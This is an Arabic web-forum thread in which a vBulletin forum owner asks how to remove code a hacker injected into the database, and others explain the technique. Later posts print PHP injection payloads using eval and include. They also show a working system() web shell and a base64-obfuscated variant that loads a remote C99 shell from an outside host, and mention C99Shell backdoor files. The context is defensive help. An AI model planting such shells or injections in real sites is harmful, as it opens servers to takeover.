يوم سوالف، في 7 أغسطس القادم

 

العودة   سوالف سوفت > قسم الشبكات والخوادم وقواعد البيانات > قواعد البيانات بمختلف أنواعها
المدوّنات البحث مشاركات اليوم اجعل كافة المشاركات مقروءة

رد
 
LinkBack أدوات الموضوع
عضو نشيط
تاريخ التسجيل: Oct 2005-
#1 (permalink)  
Exclamation قاعدة بيانات المنتدى تحتوي أكواد ارسال للهكـر


السـلام عليكم ورحمـة الله وبركاتـه

المنتـدى عندي اختـرق أكثـر من مرة والهكـر يقول
لو أسوي ايش ما اسـوي راح يخترقـه لأنه حاط اكواد ارسال
بقاعدة البيانات حتى لو غيرت الكونفج اسمه ومكانه وشفرته بالزند
راح يخترقـه وحتـى لو حطيتهـا على سيرفر ثاني على كلامـه ..
وحتى الغي الأكواد يقول لازم ارجع باك أب قبل 3 شهـور
وصعبـة اخسـر شغل 3 شهـور وأصـلاً ماعندي باك أب قبل 3 شهـور

وش الحـل ؟
كيف اشيل هالأكواد واتخلص منهـا حتى لا ترسل له المعلومات
على حسب ماقـال ..






DreAmS TeaM $ غير متواجد حالياً   قديم 18-01-2008, 07:51 AM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: May 2007-
#2 (permalink)  

الفكره في جزء اكيد في منتديات الفيبلتون
يمر على داله تنفيذ اكواد php
انا لا اعرف للفيبلتون
بس هي دي فكرتها
اخواننا هنا في المنتدى اليعرف اين يتم تنفيذ ال php بعد تسجيلها في قاعده بيانات يدلوك






__________________
انتظروا المفاجاه (سكربت ......... الاول من نوعه )
-----
شركه ارت نت
برمجه
(العاب - مواقع - ويندوز ابلكيشين )
( اداره للمواقع - حمايه للسيرفيرات)
(كشف ثغرات المواقع والسكربتات )
artint.net غير متواجد حالياً   قديم 18-01-2008, 02:24 PM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: Oct 2005-
#3 (permalink)  

تسـلم عـزيزي وبارك الله فيـك

وبإنتظـار أحد الإخـوة يفيـدني لأني ماراح
اقـدر ارجـع المنتـدى وكـل شوي الهكـر راح يطيـح قاعدة البيانات
ويـركب وحدة ثانيـة جديدة ، وعملت كل انواع الحمايـة
بس مافيـه فائـدة الرجـال يقـول لو ايش ماتسـوي
للكـونفج راح افكـه وأوصل للقـاعدة لأنهـا مصابـه بأكواد
الإرسـال المتصـلة !






DreAmS TeaM $ غير متواجد حالياً   قديم 18-01-2008, 04:42 PM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: Oct 2005-
#4 (permalink)  

الرجـال على كلامـه انه حاقن قاعـدة البيانات وبحثت بأكواد الحقن
اللي تستخـدم للإستثمـار والإستغـلال

وهم كود :

كود PHP:
".print include($HTTP_GET_VARS[cmd])." 
وكـود آخر يستخدم للحقـن والعـادة هالأكواد تحقـن بجـدول الأسئـلة الشائعـة
أو جدول قليل استخدامـه بالملف أو ما أحد يستخدمـة مثل جدول الكلنـدر والأسئـلة


كود PHP:
{${eval($_GET[vb])}} 
هـذه الأكواد اللي اعرفهـا تحقـن ومن خلالهـا يتم
الإتصـال بالقاعـدة عن طـريق ملف شـل ..

وبالمصـادفة اكتشف اربـع ملفات غـريبة على المسـار
vb/upload/1

كنت مـركب هاك المنـافع لرفع الصـور والملفات
بس حذفتـه بعـدين ..

المهم الملفات موجودة على الـرابط: رفعتهـا على تشـوفوهـا ممكن تفيد بمعـرفة وين الحقـن
1.rar - 0.07MB

..
وأشبـه ماتكون ملفات شـل لأنه صاد عنـدي الكاسبـر
سكـاي ملف med1a.php على إنه :
Backdoor.PHP.C99Shell.d

وهم ملف بعـد على المسـار
vb/upload/2/3.php

من نـوع
Backdoor.PHP.C99Shell.z
2.rar - 0.03MB

اتمنـى من الخبـراء مسـاعدتي بمعـرفة وين الحقـن
والحيـن القاعـدة عندي موجودة بس شايـل اتصالهـا






DreAmS TeaM $ غير متواجد حالياً   قديم 20-01-2008, 06:27 AM
رد مع اقتباس
عضو نشيط جدا
تاريخ التسجيل: Feb 2003-
#5 (permalink)  

حاول ترفع الملف من موقع اخر

عموما التلغيم يعتمد على بعض الدوال المهمه منها
eval
system
include

انت وضعت امثله للحقن بواسطة الدوال eval و include

وهذا مثال للتوضيح باستخدام system

كود PHP:
<?php
if(empty($_GET['shell'])){
} else {
$m=$_GET['shell'];
echo 
system($m) ;
}
?>
والبعض الاخر يقوم بتشفير الكود باستخدام اداة التشفير مثل Base64 او غيرها من برامج التشفير

مثال

كود PHP:
<?php
if(empty($_GET['shell'])){
} else {

$m=$_GET['shell'];
eval(
base64_decode('aW5jbHVkZSgiaHR0cDovL3JzdC52b2lkLnJ1L2Rvd25sb2FkL2M5OXNoZWxsLnR4dD8iKTs='));
}
?>
كود:
include("http://rst.void.ru/download/c99shell.txt?");
ابحث في التمبلت عن الدوال وقم بحذفها + تغيير يوزر وباسورد القاعده






soft غير متواجد حالياً   قديم 20-01-2008, 10:21 AM
رد مع اقتباس
رد


أدوات الموضوع

تعليمات المشاركة
لا تستطيع كتابة مواضيع
لا تستطيع كتابة ردود
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
المنتدى يتعرض للاختراق والصدمه الكبرى اعادة باك اب من شهر من قبل شركة مربع vb3vb3 إصلاح وصيانة المنتديات 30 09-10-2007 06:15 AM
مطلوب الحل علامات الاستفاهم عند استعادة قاعدة بيانات المنتدى حاتم إصلاح وصيانة المنتديات 3 24-09-2006 04:42 AM
عاجل :: على جميع المنتديات المشاركة فتح المنتدى والتجهز للتقيم نويصر إصلاح وصيانة المنتديات 33 08-05-2006 11:21 PM
خطاء في قاعدة بيانات المنتدى المنتدى ( هام جداً ) jro7i.com إصلاح وصيانة المنتديات 2 10-03-2006 01:56 PM
مشكلة في رفع قاعدة بيانات المنتدى أرجو الحل بسررررعه عبودي تطوير الويب 3 11-03-2005 04:06 AM


الساعة الآن: 10:34 AM بتوقيت المملكة العربية السعودية